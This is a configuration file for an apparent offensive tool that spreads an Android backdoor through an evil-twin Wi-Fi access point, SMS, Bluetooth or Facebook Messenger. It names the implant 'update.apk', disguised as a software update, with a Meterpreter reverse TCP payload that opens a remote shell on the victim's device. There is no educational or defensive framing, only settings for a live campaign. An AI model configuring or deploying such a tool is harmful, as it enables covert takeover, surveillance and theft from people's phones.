[Config]
###########################################
####  DEPLOY THROUGH EVIL TWIN  ###########
###########################################
[AP]
ACTIVE            = FALSE
WEBSITE_DIR       = /var/www/html/index.html

###########################################
#### DEPLOY THROUGH SMS ###################
###########################################
[SMS]
ACTIVE            = FALSE
SID               = 
TOKEN             = 
TO                = 
FROM              = 

##########################################
#### DEPLOY THROUGH BLUETOOTH ############
##########################################
[BT]
ACTIVE       = FALSE

##########################################
#### DEPLOY THROUGH FB MESSENGER #########
##########################################
[FB]
ACTIVE        = FALSE
EMAIL         = 
PASS          = 
TARGET        = 

###################################
#### BACKDOOR OPTIONS #############
###################################
[BACKDOOR]
BACKDOOR_NAME     = update.apk
BACKDOOR_PAYLOAD  = android/meterpreter/reverse_tcp
